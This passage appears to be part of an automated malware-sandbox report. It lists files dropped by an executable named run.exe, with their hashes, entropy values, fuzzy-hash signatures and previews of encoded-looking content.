                                                  SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                  Malicious:false
                                                  Preview:[ZoneTransfer]....ZoneId=0
                                                  Process:C:\Users\user\p4yx0rl0s3\run.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):4.940659878703813
                                                  Encrypted:false
                                                  SSDEEP:24:u46PiDamRf5Vt1FgLp+GZJefvoDI9qGEVX:u4kidx1wpMXg/
                                                  MD5:9FFAD0BC92E292289ACD7C904BCF6217
                                                  SHA1:EBF4A007E5D4A1E31CC697C4542853203DDC9CBD
                                                  SHA-256:7FD988C14ECE04F357F9B48351EC37DFCC204407914B49C5A4C7CF117AAA8F04
                                                  SHA-512:5F52D180EBC1A66D5BD3CC07CABAF9A50D6C6074D7839CD397FAE413FED7B3A95CFC6F7903ADC2AA29852322BB33349FB68EF09C4550147B31170A3092D23C54
                                                  Malicious:false
                                                  Preview:qauu{ztnbqape`s{|a|vgp{gccm~fd{xw.v.vpg~`}f.ej`qwgtwsevr.~{z{m}|bbjtrr`z~}ptcutz|ez.gfaeftaofkuet|`z}pn.gdyfdyxskgfhkhqorswyj{vbbxvrfp.}||a}s`r|l...{qgo|xtn`zel{~q{``prfjdavjxz|qp`kw.mau|gpopx|vg|d.|.`ftuqbuqy~asz{`bnc|kgd~jggvoggp~g|ar`iasz{hy~kp`am|or}n{dgx.e|.spy~etzp{guywzys}tmy.fu|{~dtavke{}~g{m}z~z.qwbzuie~qzmxarbkcfz{ct~yq.f.yf`~.}`qa.q}oozmzk`|~ai~gkywrvtvbl}`vt|}gsruxu{fjz..sqek.agtrbxja`fv.cgn`}gqx`q~nd}fezpx.tys`ztl`zjr}p|x.jobpumsufgcfkdrepiw.xrylpeyzdmu.{{g~purkdf`zdgvxx~}tuxxbpwmvrcsrrfw{ikdnccav`p{srk{|`|muhgf|}ddrwryyyrtcdp.`~obli.`lp.f~kbarm~odpvf}ekhg{q~haaygtwtey}~rj.oe`|wwaroppg`jxksyv}m.{`c|~bkman~srkmtyyxb`r|uvfscpp{}kmt~`~}xffostud~vcd~s}c`biya~ecciq|i..ftroy}{py{}s{b}qv|rxqcdb.t}k~}b.mrcwtdbshzdg}r.eubyk~fk~}ubxlc.~.}jyox.pqi{zhmz}lpvgkf~~i{xfq|rhotp~figudxczronuo{f`.mfn|r`ao|||s`kxfey`{znyg~rbfj}cb`dyaaspduqtt{em|wtv.}{aj~msxoywfx{k{or.txsmt~a|j.iqzybo~y`bqs.hlb.ndivxt~.evjp`b.{myfridjbvvju}kuj|phx.fkgcduq`t{bylgf|}.q~qpwjsaqomqigghlibet~uze`frwqsw~~du`yppmdzxu
                                                  Process:C:\Users\user\p4yx0rl0s3\run.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):4.923468988386607
                                                  Encrypted:false
                                                  SSDEEP:24:Qa7JoftIB621nexwaztxxJY7+nDVoQNNZjYROeId2:9toqB621nwwaztxxJYSnhoQ7Zeh
                                                  MD5:1642D6B6008B707034A236A497D2A8DE
                                                  SHA1:12AFA921CCC3955D9A8226D344337EEE29FB7954
                                                  SHA-256:F1C52CBAF96B67ED0ABE3583572E6F3A4B4087360A1010478807C960B42ED789
                                                  SHA-512:DA7DF571C76D008CA031CC171C7C2754CAD1EC26B33EE327AF60285BC202870456D1178D2C605A5CD0B8050696105BB04AC3A4A44B4FEFA2FE2E2E044E8FFC57
                                                  Malicious:false
                                                  Preview:{ey~cqpmxv.qou{cmiqabipfvnu~x`uti}}arfqarrtw.bzvtpttupxzccyhszl.o|ez}bpvbxdr~v{.m.gy.~~y`.qacbgtdboczzbfqjb}jw.z~`z|lmwwuyxt|x{anrb~bpe{|xaa~.w`ge{}g{rpips`fgybzabr`iwbmz}yvrk|w|wu{|cyyp`fq.ybyplxntw|`pzv~|cbfvto.asuqw`.~m``noqaga{nxvqhtg|ec.v|npy}woz|`p}`x|ad}i|}`.izvcmzgo|gyyrd|ubutxu`leloqifgye`wa`.`xxwrsee`ure{wfb~njlf`l}yo.ucatnygwr}~pd}wt{extxpclexl.gks.vz`a.zw{|va{a|yzknahux.wa{e}~tgvq}se`zi}qproizibur.n.xp{fbsavdguda.o~dm~b~p`vato`g`rgiy~bao}rcwtnmfzyidxi}~v}xv}q`xqna``}v{guzg`tsguix~ltbrtfxwxdgmvoquass|r}u}adgnzbnu`x.k}i|`v~pc{~}b|nauuy..mqfyzuy||pqb{xab`p.srlzqvaju~xcpoycygpv`|r}kitjr~qyrvju}b||dgb|kkxczzmx.|{ya{zqm~rek.}eptv|.c}uy.occ`zq`ttdm~uvgupvqa~z|i{q`y~z~oiccy~l|}b}rtcfpzl`~afg`psqqdupbvdd~|xr.t|`k|xx{{rfcgcwboxupj`k||qn|au}}gtaabwr{yi~egpmwryy~grdp~~dc`iosflyfrup|~rmfo|br~.ypme{grbqhbrgfu~ona{`.ucp~rt{nd|dchjwgo`~uzblytnodizx|h}c~gmc~.eow|oa}tcis{yd.ssgrayjlm`gpf.oufofoddq`wkm}zquuyhtw|d.}braqbl}r{}|vulap.tia|`}kvbxabghuzxqqvkjpuvgqvup}jamzrefmd`qayzhnmx.~cp.cou.ucxl
                                                  Process:C:\Users\user\p4yx0rl0s3\run.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):4.923468988386607
                                                  Encrypted:false
                                                  SSDEEP:24:Qa7JoftIB621nexwaztxxJY7+nDVoQNNZjYROeId2:9toqB621nwwaztxxJYSnhoQ7Zeh
                                                  MD5:1642D6B6008B707034A236A497D2A8DE
                                                  SHA1:12AFA921CCC3955D9A8226D344337EEE29FB7954
                                                  SHA-256:F1C52CBAF96B67ED0ABE3583572E6F3A4B4087360A1010478807C960B42ED789
                                                  SHA-512:DA7DF571C76D008CA031CC171C7C2754CAD1EC26B33EE327AF60285BC202870456D1178D2C605A5CD0B8050696105BB04AC3A4A44B4FEFA2FE2E2E044E8FFC57
                                                  Malicious:false
                                                  Preview:{ey~cqpmxv.qou{cmiqabipfvnu~x`uti}}arfqarrtw.bzvtpttupxzccyhszl.o|ez}bpvbxdr~v{.m.gy.~~y`.qacbgtdboczzbfqjb}jw.z~`z|lmwwuyxt|x{anrb~bpe{|xaa~.w`ge{}g{rpips`fgybzabr`iwbmz}yvrk|w|wu{|cyyp`fq.ybyplxntw|`pzv~|cbfvto.asuqw`.~m``noqaga{nxvqhtg|ec.v|npy}woz|`p}`x|ad}i|}`.izvcmzgo|gyyrd|ubutxu`leloqifgye`wa`.`xxwrsee`ure{wfb~njlf`l}yo.ucatnygwr}~pd}wt{extxpclexl.gks.vz`a.zw{|va{a|yzknahux.wa{e}~tgvq}se`zi}qproizibur.n.xp{fbsavdguda.o~dm~b~p`vato`g`rgiy~bao}rcwtnmfzyidxi}~v}xv}q`xqna``}v{guzg`tsguix~ltbrtfxwxdgmvoquass|r}u}adgnzbnu`x.k}i|`v~pc{~}b|nauuy..mqfyzuy||pqb{xab`p.srlzqvaju~xcpoycygpv`|r}kitjr~qyrvju}b||dgb|kkxczzmx.|{ya{zqm~rek.}eptv|.c}uy.occ`zq`ttdm~uvgupvqa~z|i{q`y~z~oiccy~l|}b}rtcfpzl`~afg`psqqdupbvdd~|xr.t|`k|xx{{rfcgcwboxupj`k||qn|au}}gtaabwr{yi~egpmwryy~grdp~~dc`iosflyfrup|~rmfo|br~.ypme{grbqhbrgfu~ona{`.ucp~rt{nd|dchjwgo`~uzblytnodizx|h}c~gmc~.eow|oa}tcis{yd.ssgrayjlm`gpf.oufofoddq`wkm}zquuyhtw|d.}braqbl}r{}|vulap.tia|`}kvbxabghuzxqqvkjpuvgqvup}jamzrefmd`qayzhnmx.~cp.cou.ucxl
                                                  Process:C:\Users\user\p4yx0rl0s3\run.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):4.9570996395004
                                                  Encrypted:false
                                                  SSDEEP:24:RCrGEPv5COAENHcPskyaDKx6feXKS9bHi4RPc/KHX:ROPYO3DaOsfGKc3wK3
                                                  MD5:EE1EBDC404E8FB05E5F4DF3284EBF727
                                                  SHA1:C401AD3638F921977C26DEACE84803F9B8C54962
                                                  SHA-256:828BFA9D2FFCA4CD8D03757A4C2BCDB0285942C9B105C12BA760A06C1E7B770D
                                                  SHA-512:DF705C5D340822C3F6BCAC60BFB3FD9DCFCDF3FBC3399186E362A64AAC2EDB9ACE437EAA9658F635AB1128DD61AE1C905AA3786326E26EE0BF66313CE3A5747D
                                                  Malicious:false
                                                  Preview:xplxmo`{a`kr{pjpczsrytmwxgmwrjebvu{f|{{|qreqs{sp|oe~kcc{~cusc{rp.fp}c`tqpocsqf{ig~r.s|dff}ucqj.{gapaeg.{juytyu`abr{gktl}f`wt}y`azu~e`e|jibwtt`kfutkmqvjd`e{rbmwy|xy|oztanixqaktmtq`kwrese.|ug~}v}myd.paaz`ezn.apeaum{prsvk~{elbtexyfixt|lo.~urwg{a..vql}`uidxsnzevdpgyfb{ckfs`afcsdk~bfzhboyd}kwuerzjbuqu}jopzarc}zl||ppwf}pbay{uffi}|s`}.u.dx{|`a~|rgtbt~wbt~dkre~f~osgzyp`vfwtiebyx.rn}f.gvw}rgba`cy}|fdaffxfvpnsg`l.zyfwo.h.z|bk}vato.vhc}fo}.ezeoeraie}}lhyptb}meoubpxlryqdkw~z~sip~scq.~lqvdpbkv{.pkoyyidy`tnlx`mygk~su|cnq~wczk{aftskc`spmavyyj~okp{pmig`u{p{f}|eze{.ar|pwbpo|`sbveeahyjbc|ju}|olpknxia{chwfwauyffslf.xoeejzt.otci{iw`wvz..tnbybo.bxmv.`wldqr.r|paqv}zf{ix}`gzkupfwv|k`prxh`kzbgzqzo|zz{alw|sivibct{j`zxg{rjq~w|b`bkplgvu.v|vfjiognbrka|deqbxrbyp}`q|zjtavr|d~rzzevzbn{vrlxcgbzi`xmy.j|.rl|}`s.fdcdz}.jpyrt~cc.upwfzagnm~|szauo.tyhbbprs~agdcq.sqhmaaldivdrq|ctzdagjm{rsvikab}vkofucbbj~`driftgqmgkpsjaz`nv~ttyxry.pfnntin}hnregd}|jr`qu|.`|qvzyu`etp~{vx|{tq}iw{gls|d|zzk|o||}{tz.vrr{eabybqv}r|}dewpqp{izaxuci|q
                                                  Process:C:\Users\user\p4yx0rl0s3\run.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):4.951335587154764
                                                  Encrypted:false
                                                  SSDEEP:24:q33lWhFS8eTBfhKeApa9KXthZYdADV3I4rdaUCDYRs8HQl:81WhUPCG9KXnGwTr50YFHo
                                                  MD5:95A6A199A8C29D310F2185128C494774
                                                  SHA1:09321942D2215AB3D4B9816AE5572E79133D88D4
                                                  SHA-256:96FA7F6EB43F2F19B75338534B938218DA13F1BA0526E256B88285190E204B38
                                                  SHA-512:18844D1F9D98FD1295CA8341D914D0D7D0786FAE55F855C7708BC48F14A23D098FBF594AFC01064C491B529D4652855535308B51FA57B83C67AEDA0FEE976768
                                                  Malicious:false
                                                  Preview:xko.{gnazzbgqu}qrxpfwlufv~pg{{p.et~y`ec~|lbsqaruks{ajqfig}gj..ynlzac`oubbsq.expi.vbbb~yxzdvtfrfjhpuax~r{jvuxfob|jn~hz|cl~ywp}~cgh.ob}v`unyqls~xw{qfwe}addzpo.ylvbuvdswyqb{fahkvvbpbr{csmz{ystp|ktuy{wkdxj.z{mutte{gpmtt{iwgqc{`zs~c||rm}cvta~fcrvrlvzys`~vjccr~pabyd{|c|wdeuow}xfkfbguqqwdfz{rbt}xsys~zccsyvvdxx~`wovlo~gpxxbyza~qud|asryaupid|tqh`ejp{abooad~}ux||eiznrecwk{zqo`zvvp}qlqd{lvfk~trqubaaofr{~`efqeporc`a~}wdtjnx`qogetnbeqo`ryryj~sv.cirq{`zsz|`p}.ztnyqxru{rmq`l}|usxxm{gpejhlmewls}qc{evim.c|p|jn|fdadx`owfwtqkcc~jxq`bax}duz.layjxqgpmtaaqp~yt{pamc~g.{wcmd{n`dywr.busgf}|urtwumr|jrfanznw}e{~kogzqz`bxp~pb`zndxyzpge.tqbppbr{ouzpxl`ob}pxr`u`zha.|nbvoqsbe`t{|{ce`yqwsx~lvwww}aygtzp}}pdo`{zqbqdha|}{yd}s`dzt`nnyyd}y.vlsivrs}dw`u{aoa{dzuzeqpccbqztn.g.}uh.{{lfwtvrctxjtlfumaxyrsfruax}yyqzfm~hidfqmth.txti}baqv}mcuz{otqssyacsp|pgah}.pxagsme}oz|.q{ls{iq{~}d{a~.zcwhomlyi~wco|zn|c|ywxmrvxtzf{fss|jfbyuehn{zw}s}cb|x|rrb|pfwyx.gbykgk|.bhxxaea.{hqx~ogjb.rt{zmto~iq{t~dv~czfddr.mvaqsrmlwsk{gpuejb.x}o}gwavw~{ia`b
                                                  Process:C:\Users\user\p4yx0rl0s3\run.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):4.951335587154764
                                                  Encrypted:false
                                                  SSDEEP:24:q33lWhFS8eTBfhKeApa9KXthZYdADV3I4rdaUCDYRs8HQl:81WhUPCG9KXnGwTr50YFHo
                                                  MD5:95A6A199A8C29D310F2185128C494774
                                                  SHA1:09321942D2215AB3D4B9816AE5572E79133D88D4
                                                  SHA-256:96FA7F6EB43F2F19B75338534B938218DA13F1BA0526E256B88285190E204B38
                                                  SHA-512:18844D1F9D98FD1295CA8341D914D0D7D0786FAE55F855C7708BC48F14A23D098FBF594AFC01064C491B529D4652855535308B51FA57B83C67AEDA0FEE976768
                                                  Malicious:false
                                                  Preview:xko.{gnazzbgqu}qrxpfwlufv~pg{{p.et~y`ec~|lbsqaruks{ajqfig}gj..ynlzac`oubbsq.expi.vbbb~yxzdvtfrfjhpuax~r{jvuxfob|jn~hz|cl~ywp}~cgh.ob}v`unyqls~xw{qfwe}addzpo.ylvbuvdswyqb{fahkvvbpbr{csmz{ystp|ktuy{wkdxj.z{mutte{gpmtt{iwgqc{`zs~c||rm}cvta~fcrvrlvzys`~vjccr~pabyd{|c|wdeuow}xfkfbguqqwdfz{rbt}xsys~zccsyvvdxx~`wovlo~gpxxbyza~qud|asryaupid|tqh`ejp{abooad~}ux||eiznrecwk{zqo`zvvp}qlqd{lvfk~trqubaaofr{~`efqeporc`a~}wdtjnx`qogetnbeqo`ryryj~sv.cirq{`zsz|`p}.ztnyqxru{rmq`l}|usxxm{gpejhlmewls}qc{evim.c|p|jn|fdadx`owfwtqkcc~jxq`bax}duz.layjxqgpmtaaqp~yt{pamc~g.{wcmd{n`dywr.busgf}|urtwumr|jrfanznw}e{~kogzqz`bxp~pb`zndxyzpge.tqbppbr{ouzpxl`ob}pxr`u`zha.|nbvoqsbe`t{|{ce`yqwsx~lvwww}aygtzp}}pdo`{zqbqdha|}{yd}s`dzt`nnyyd}y.vlsivrs}dw`u{aoa{dzuzeqpccbqztn.g.}uh.{{lfwtvrctxjtlfumaxyrsfruax}yyqzfm~hidfqmth.txti}baqv}mcuz{otqssyacsp|pgah}.pxagsme}oz|.q{ls{iq{~}d{a~.zcwhomlyi~wco|zn|c|ywxmrvxtzf{fss|jfbyuehn{zw}s}cb|x|rrb|pfwyx.gbykgk|.bhxxaea.{hqx~ogjb.rt{zmto~iq{t~dv~czfddr.mvaqsrmlwsk{gpuejb.x}o}gwavw~{ia`b
                                                  Process:C:\Users\user\p4yx0rl0s3\run.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):4.933622675062732
                                                  Encrypted:false
                                                  SSDEEP:24:C7VapbGyIlxxezDLyY/mTtzLGqnUisA1S2XFYP7/oaRM:C7yGyIteuYeNLbUjAY2VYPG
                                                  MD5:B677A7ABE0647FA17458B201F4EAEAC7
                                                  SHA1:7288E136C86747037A56F1999C8BFFC0E32E1ED7
                                                  SHA-256:C171945475A4153C9ABB0B685CF3AA0E6ACE9A7592AAFD4143826AEFD76CC0EB
                                                  SHA-512:F18F04C42C066A9204C7032EE2E5FB90A3D9A8D1A333089FB9C6D40B0D164969636F22BD74518A0A1DFB34EB80307EFAE1E4E44AF241C7DF5B361AD4F4F0490D
                                                  Malicious:false
                                                  Preview:.estlwe}hijzbq|{fjg`vpzp~yudt`{zyt}au~rx{ctpg{.pqsrfadgf|{.rjqdbndcfpv}odakqdwnnxs.ocbt`ytabbqnwk``.x}hpbg|yjmmcd~chkkyegzexw~pdlc`.rkxlhdtqvyb.{vjbtpzuxtpl`m`{i{~o.binxb.k|jibqxpwak~mfpudygbyrwpadpfvqy{vru.grb`vzpxw}uf.ba`|~pwqvh{.f}yaw~wda{{}|ppvwttyc|vyfg.fwlnnxgkga|ygnlrce{a{.zo`r~dk.pe.qwq{uga{p`kxdt`hr|cmpjqzvzzmppnkka`seyqpffwovwe~}tqewcp`nupijpcwop{il{~pwo}e}{jicyavpvu}w``|l}{rfrinvgk{xzr`gozqqwrgb|lgkoa`p{j`{rmggu~{euxyporagg|z~gpbpzqzg`.yg}ewqu.t.qcttii~xrlorf`xv`~rstm`c}pgiwgawp|.{.}blpiwygd.zu{axvuhxwfqqwqdsdgrvpxpabtus|nzxrw|lb~o{zogcpqx}w}uia|.ibdxp}y.zqbbl}kktspywv{eg`s|halsprbe{d~z|y{zqwqk`~z{gau}ryopx}gtw~peyq.rfwbo|ttbwr|pjs}w`pyaisldo|yusksnrqa`setw{ffwd~z|xz`vqgc{dwb~e|re}i.p{m~|qolwy}`zyqqverua..a`g~ud.zt.yt}fauxssqddb`ez.`..g|wyv|j~bcnk}ub~qeb}{{dxg~}mol{h~xgaab~uvw{dyaos}q~qugtp|n{de{i.odwwaek.y|`hsxfbv{hhmox{fpdp~aafp|sz`}rr`{lra|lxiua{gu~|zco}zkhagrvdkdfv}cewldooh{wpldgbd.fdw~tul|o~azvudvprncrky|k|lewtz.a}vwstzn}~jz`qqwcwbulei.yg`zknt|dzj~wpcwd|ampdy{va{.guycks
                                                  Process:C:\Users\user\p4yx0rl0s3\run.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):4.933622675062732
                                                  Encrypted:false
                                                  SSDEEP:24:C7VapbGyIlxxezDLyY/mTtzLGqnUisA1S2XFYP7/oaRM:C7yGyIteuYeNLbUjAY2VYPG
                                                  MD5:B677A7ABE0647FA17458B201F4EAEAC7
                                                  SHA1:7288E136C86747037A56F1999C8BFFC0E32E1ED7
                                                  SHA-256:C171945475A4153C9ABB0B685CF3AA0E6ACE9A7592AAFD4143826AEFD76CC0EB
                                                  SHA-512:F18F04C42C066A9204C7032EE2E5FB90A3D9A8D1A333089FB9C6D40B0D164969636F22BD74518A0A1DFB34EB80307EFAE1E4E44AF241C7DF5B361AD4F4F0490D
                                                  Malicious:false
                                                  Preview:.estlwe}hijzbq|{fjg`vpzp~yudt`{zyt}au~rx{ctpg{.pqsrfadgf|{.rjqdbndcfpv}odakqdwnnxs.ocbt`ytabbqnwk``.x}hpbg|yjmmcd~chkkyegzexw~pdlc`.rkxlhdtqvyb.{vjbtpzuxtpl`m`{i{~o.binxb.k|jibqxpwak~mfpudygbyrwpadpfvqy{vru.grb`vzpxw}uf.ba`|~pwqvh{.f}yaw~wda{{}|ppvwttyc|vyfg.fwlnnxgkga|ygnlrce{a{.zo`r~dk.pe.qwq{uga{p`kxdt`hr|cmpjqzvzzmppnkka`seyqpffwovwe~}tqewcp`nupijpcwop{il{~pwo}e}{jicyavpvu}w``|l}{rfrinvgk{xzr`gozqqwrgb|lgkoa`p{j`{rmggu~{euxyporagg|z~gpbpzqzg`.yg}ewqu.t.qcttii~xrlorf`xv`~rstm`c}pgiwgawp|.{.}blpiwygd.zu{axvuhxwfqqwqdsdgrvpxpabtus|nzxrw|lb~o{zogcpqx}w}uia|.ibdxp}y.zqbbl}kktspywv{eg`s|halsprbe{d~z|y{zqwqk`~z{gau}ryopx}gtw~peyq.rfwbo|ttbwr|pjs}w`pyaisldo|yusksnrqa`setw{ffwd~z|xz`vqgc{dwb~e|re}i.p{m~|qolwy}`zyqqverua..a`g~ud.zt.yt}fauxssqddb`ez.`..g|wyv|j~bcnk}ub~qeb}{{dxg~}mol{h~xgaab~uvw{dyaos}q~qugtp|n{de{i.odwwaek.y|`hsxfbv{hhmox{fpdp~aafp|sz`}rr`{lra|lxiua{gu~|zco}zkhagrvdkdfv}cewldooh{wpldgbd.fdw~tul|o~azvudvprncrky|k|lewtz.a}vwstzn}~jz`qqwcwbulei.yg`zknt|dzj~wpcwd|ampdy{va{.guycks
                                                  Process:C:\Users\user\p4yx0rl0s3\run.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):4.940659878703813
                                                  Encrypted:false
                                                  SSDEEP:24:u46PiDamRf5Vt1FgLp+GZJefvoDI9qGEVX:u4kidx1wpMXg/
                                                  MD5:9FFAD0BC92E292289ACD7C904BCF6217
                                                  SHA1:EBF4A007E5D4A1E31CC697C4542853203DDC9CBD
                                                  SHA-256:7FD988C14ECE04F357F9B48351EC37DFCC204407914B49C5A4C7CF117AAA8F04
                                                  SHA-512:5F52D180EBC1A66D5BD3CC07CABAF9A50D6C6074D7839CD397FAE413FED7B3A95CFC6F7903ADC2AA29852322BB33349FB68EF09C4550147B31170A3092D23C54
                                                  Malicious:false
                                                  Preview:qauu{ztnbqape`s{|a|vgp{gccm~fd{xw.v.vpg~`}f.ej`qwgtwsevr.~{z{m}|bbjtrr`z~}ptcutz|ez.gfaeftaofkuet|`z}pn.gdyfdyxskgfhkhqorswyj{vbbxvrfp.}||a}s`r|l...{qgo|xtn`zel{~q{``prfjdavjxz|qp`kw.mau|gpopx|vg|d.|.`ftuqbuqy~asz{`bnc|kgd~jggvoggp~g|ar`iasz{hy~kp`am|or}n{dgx.e|.spy~etzp{guywzys}tmy.fu|{~dtavke{}~g{m}z~z.qwbzuie~qzmxarbkcfz{ct~yq.f.yf`~.}`qa.q}oozmzk`|~ai~gkywrvtvbl}`vt|}gsruxu{fjz..sqek.agtrbxja`fv.cgn`}gqx`q~nd}fezpx.tys`ztl`zjr}p|x.jobpumsufgcfkdrepiw.xrylpeyzdmu.{{g~purkdf`zdgvxx~}tuxxbpwmvrcsrrfw{ikdnccav`p{srk{|`|muhgf|}ddrwryyyrtcdp.`~obli.`lp.f~kbarm~odpvf}ekhg{q~haaygtwtey}~rj.oe`|wwaroppg`jxksyv}m.{`c|~bkman~srkmtyyxb`r|uvfscpp{}kmt~`~}xffostud~vcd~s}c`biya~ecciq|i..ftroy}{py{}s{b}qv|rxqcdb.t}k~}b.mrcwtdbshzdg}r.eubyk~fk~}ubxlc.~.}jyox.pqi{zhmz}lpvgkf~~i{xfq|rhotp~figudxczronuo{f`.mfn|r`ao|||s`kxfey`{znyg~rbfj}cb`dyaaspduqtt{em|wtv.}{aj~msxoywfx{k{or.txsmt~a|j.iqzybo~y`bqs.hlb.ndivxt~.evjp`b.{myfridjbvvju}kuj|phx.fkgcduq`t{bylgf|}.q~qpwjsaqomqigghlibet~uze`frwqsw~~du`yppmdzxu
                                                  Process:C:\Users\user\p4yx0rl0s3\run.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):4.923468988386607
                                                  Encrypted:false
                                                  SSDEEP:24:Qa7JoftIB621nexwaztxxJY7+nDVoQNNZjYROeId2:9toqB621nwwaztxxJYSnhoQ7Zeh
                                                  MD5:1642D6B6008B707034A236A497D2A8DE
                                                  SHA1:12AFA921CCC3955D9A8226D344337EEE29FB7954
                                                  SHA-256:F1C52CBAF96B67ED0ABE3583572E6F3A4B4087360A1010478807C960B42ED789
                                                  SHA-512:DA7DF571C76D008CA031CC171C7C2754CAD1EC26B33EE327AF60285BC202870456D1178D2C605A5CD0B8050696105BB04AC3A4A44B4FEFA2FE2E2E044E8FFC57
                                                  Malicious:false
                                                  Preview:{ey~cqpmxv.qou{cmiqabipfvnu~x`uti}}arfqarrtw.bzvtpttupxzccyhszl.o|ez}bpvbxdr~v{.m.gy.~~y`.qacbgtdboczzbfqjb}jw.z~`z|lmwwuyxt|x{anrb~bpe{|xaa~.w`ge{}g{rpips`fgybzabr`iwbmz}yvrk|w|wu{|cyyp`fq.ybyplxntw|`pzv~|cbfvto.asuqw`.~m``noqaga{nxvqhtg|ec.v|npy}woz|`p}`x|ad}i|}`.izvcmzgo|gyyrd|ubutxu`leloqifgye`wa`.`xxwrsee`ure{wfb~njlf`l}yo.ucatnygwr}~pd}wt{extxpclexl.gks.vz`a.zw{|va{a|yzknahux.wa{e}~tgvq}se`zi}qproizibur.n.xp{fbsavdguda.o~dm~b~p`vato`g`rgiy~bao}rcwtnmfzyidxi}~v}xv}q`xqna``}v{guzg`tsguix~ltbrtfxwxdgmvoquass|r}u}adgnzbnu`x.k}i|`v~pc{~}b|nauuy..mqfyzuy||pqb{xab`p.srlzqvaju~xcpoycygpv`|r}kitjr~qyrvju}b||dgb|kkxczzmx.|{ya{zqm~rek.}eptv|.c}uy.occ`zq`ttdm~uvgupvqa~z|i{q`y~z~oiccy~l|}b}rtcfpzl`~afg`psqqdupbvdd~|xr.t|`k|xx{{rfcgcwboxupj`k||qn|au}}gtaabwr{yi~egpmwryy~grdp~~dc`iosflyfrup|~rmfo|br~.ypme{grbqhbrgfu~ona{`.ucp~rt{nd|dchjwgo`~uzblytnodizx|h}c~gmc~.eow|oa}tcis{yd.ssgrayjlm`gpf.oufofoddq`wkm}zquuyhtw|d.}braqbl}r{}|vulap.tia|`}kvbxabghuzxqqvkjpuvgqvup}jamzrefmd`qayzhnmx.~cp.cou.ucxl
                                                  Process:C:\Users\user\p4yx0rl0s3\run.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):4.923468988386607
                                                  Encrypted:false
                                                  SSDEEP:24:Qa7JoftIB621nexwaztxxJY7+nDVoQNNZjYROeId2:9toqB621nwwaztxxJYSnhoQ7Zeh
                                                  MD5:1642D6B6008B707034A236A497D2A8DE
                                                  SHA1:12AFA921CCC3955D9A8226D344337EEE29FB7954
                                                  SHA-256:F1C52CBAF96B67ED0ABE3583572E6F3A4B4087360A1010478807C960B42ED789
                                                  SHA-512:DA7DF571C76D008CA031CC171C7C2754CAD1EC26B33EE327AF60285BC202870456D1178D2C605A5CD0B8050696105BB04AC3A4A44B4FEFA2FE2E2E044E8FFC57
                                                  Malicious:false
                                                  Preview:{ey~cqpmxv.qou{cmiqabipfvnu~x`uti}}arfqarrtw.bzvtpttupxzccyhszl.o|ez}bpvbxdr~v{.m.gy.~~y`.qacbgtdboczzbfqjb}jw.z~`z|lmwwuyxt|x{anrb~bpe{|xaa~.w`ge{}g{rpips`fgybzabr`iwbmz}yvrk|w|wu{|cyyp`fq.ybyplxntw|`pzv~|cbfvto.asuqw`.~m``noqaga{nxvqhtg|ec.v|npy}woz|`p}`x|ad}i|}`.izvcmzgo|gyyrd|ubutxu`leloqifgye`wa`.`xxwrsee`ure{wfb~njlf`l}yo.ucatnygwr}~pd}wt{extxpclexl.gks.vz`a.zw{|va{a|yzknahux.wa{e}~tgvq}se`zi}qproizibur.n.xp{fbsavdguda.o~dm~b~p`vato`g`rgiy~bao}rcwtnmfzyidxi}~v}xv}q`xqna``}v{guzg`tsguix~ltbrtfxwxdgmvoquass|r}u}adgnzbnu`x.k}i|`v~pc{~}b|nauuy..mqfyzuy||pqb{xab`p.srlzqvaju~xcpoycygpv`|r}kitjr~qyrvju}b||dgb|kkxczzmx.|{ya{zqm~rek.}eptv|.c}uy.occ`zq`ttdm~uvgupvqa~z|i{q`y~z~oiccy~l|}b}rtcfpzl`~afg`psqqdupbvdd~|xr.t|`k|xx{{rfcgcwboxupj`k||qn|au}}gtaabwr{yi~egpmwryy~grdp~~dc`iosflyfrup|~rmfo|br~.ypme{grbqhbrgfu~ona{`.ucp~rt{nd|dchjwgo`~uzblytnodizx|h}c~gmc~.eow|oa}tcis{yd.ssgrayjlm`gpf.oufofoddq`wkm}zquuyhtw|d.}braqbl}r{}|vulap.tia|`}kvbxabghuzxqqvkjpuvgqvup}jamzrefmd`qayzhnmx.~cp.cou.ucxl
                                                  Process:C:\Users\user\p4yx0rl0s3\run.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):4.9570996395004
                                                  Encrypted:false
                                                  SSDEEP:24:RCrGEPv5COAENHcPskyaDKx6feXKS9bHi4RPc/KHX:ROPYO3DaOsfGKc3wK3
                                                  MD5:EE1EBDC404E8FB05E5F4DF3284EBF727
                                                  SHA1:C401AD3638F921977C26DEACE84803F9B8C54962
                                                  SHA-256:828BFA9D2FFCA4CD8D03757A4C2BCDB0285942C9B105C12BA760A06C1E7B770D
                                                  SHA-512:DF705C5D340822C3F6BCAC60BFB3FD9DCFCDF3FBC3399186E362A64AAC2EDB9ACE437EAA9658F635AB1128DD61AE1C905AA3786326E26EE0BF66313CE3A5747D
                                                  Malicious:false
